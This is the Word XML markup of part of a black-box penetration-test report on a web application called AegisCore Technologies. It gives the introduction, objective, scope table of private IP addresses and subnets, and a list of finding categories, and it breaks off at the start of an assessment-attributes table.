    <w:p w14:paraId="554F442B" w14:textId="77777777" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00585A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Multiple Critical Remote Code Execution Paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177B6880" w14:textId="77777777" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00585A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Sensitive Credentials Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E7B87D" w14:textId="68F3265A" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00585A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Privilege Escalation Misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2666A8A4" w14:textId="720F0605" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00585A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Insecure File Handling and Upload Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD857DD" w14:textId="77777777" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49826AE7" w14:textId="087E4231" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="001E5C24">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc507421617"/>
      <w:bookmarkStart w:id="169" w:name="_Toc223521148"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="006923B6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">11 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w14:paraId="58BF6AEE" w14:textId="1A7D52E3" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This report document hereby describes the proceedings and results of a Black Box security assessment conducted against</w:t>
      </w:r>
      <w:r w:rsidR="00C85826" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> AegisCore Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. The report hereby lists the findings and corresponding best practice mitigation actions and recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8FF0E8" w14:textId="77777777" w:rsidR="00D77DFE" w:rsidRDefault="00D77DFE" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc223521149"/>
    </w:p>
    <w:p w14:paraId="4DD4AD74" w14:textId="6F19B132" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="00D77DFE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="006923B6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">12 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p w14:paraId="6D2AA1C7" w14:textId="0520DA5C" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="0035668C" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The objective of the assessment was to evaluate the security posture of the AegisCore Technologies web application, identify existing vulnerabilities, and deliver a final report outlining findings, remediation strategies, and recommendations to reduce the associated risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FA298" w14:textId="010235CD" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc223521150"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="006923B6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">13 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w14:paraId="14805554" w14:textId="0D44737F" w:rsidR="001917CF" w:rsidRPr="005F6208" w:rsidRDefault="006F08D7" w:rsidP="005F6208">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This section defines the scope and boundaries of the project.</w:t>
      </w:r>
      <w:bookmarkStart w:id="172" w:name="_Toc228687489"/>
    </w:p>
    <w:p w14:paraId="77BED84E" w14:textId="77777777" w:rsidR="001917CF" w:rsidRDefault="001917CF" w:rsidP="00431D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA0B4E3" w14:textId="77777777" w:rsidR="001917CF" w:rsidRDefault="001917CF" w:rsidP="00431D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21AC3C11" w14:textId="5E940832" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00431D09" w:rsidP="00431D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 6.2: Scope Target</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="4944" w:type="pc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000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1649"/>
        <w:gridCol w:w="6749"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="5ACB53D0" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="411"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="00CBC32C" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00EE4B82">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Application Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4018" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="240B265C" w14:textId="35B85F7E" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC4E52" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AegisCore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Technologies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="272AE728" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="471"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="455B4757" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="001E5C24">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4018" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59CC9EA2" w14:textId="05527D66" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="00C85826" w:rsidP="001E5C24">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>http://10.0.2.178:8080/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B4D14FD" w14:textId="164C0563" w:rsidR="00FC4E52" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC4E52" w:rsidP="001E5C24">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:b w:val="0"/>
                  <w:sz w:val="20"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://10.0.3.190:80/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC4E52" w:rsidRPr="00D77DFE" w14:paraId="727ED302" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="471"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="15EA940E" w14:textId="1C1169DD" w:rsidR="00FC4E52" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC4E52" w:rsidP="001E5C24">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4018" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2F2FC261" w14:textId="77777777" w:rsidR="00FC4E52" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC4E52" w:rsidP="001E5C24">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.0.2.0/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="338E0DB9" w14:textId="77777777" w:rsidR="00FC4E52" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC4E52" w:rsidP="001E5C24">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.0.3.0/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="633E9249" w14:textId="212ACB70" w:rsidR="00FC4E52" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC4E52" w:rsidP="001E5C24">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.0.4.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FEA5050" w14:textId="77777777" w:rsidR="00D77DFE" w:rsidRDefault="00D77DFE" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc228687491"/>
      <w:bookmarkStart w:id="174" w:name="_Toc265516490"/>
      <w:bookmarkStart w:id="175" w:name="_Toc265518432"/>
      <w:bookmarkStart w:id="176" w:name="_Toc341868327"/>
      <w:bookmarkStart w:id="177" w:name="_Toc486603935"/>
      <w:bookmarkStart w:id="178" w:name="_Toc486605065"/>
      <w:bookmarkStart w:id="179" w:name="_Toc486846869"/>
      <w:bookmarkStart w:id="180" w:name="_Toc507421621"/>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w14:paraId="1F95197F" w14:textId="77777777" w:rsidR="001917CF" w:rsidRDefault="001917CF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B608E5" w14:textId="77777777" w:rsidR="001917CF" w:rsidRDefault="001917CF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4285B5" w14:textId="35FFE30C" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Assessment Attribute(s)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
      <w:bookmarkEnd w:id="174"/>
      <w:bookmarkEnd w:id="175"/>
      <w:bookmarkEnd w:id="176"/>
      <w:bookmarkEnd w:id="177"/>
      <w:bookmarkEnd w:id="178"/>
      <w:bookmarkEnd w:id="179"/>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w14:paraId="74A13A12" w14:textId="700B5F78" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00431D09" w:rsidP="00431D09">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 6.3: Assessment attributes</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="-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85"/>
        <w:gridCol w:w="5408"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="6608F595" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
            <w:tcBorders>
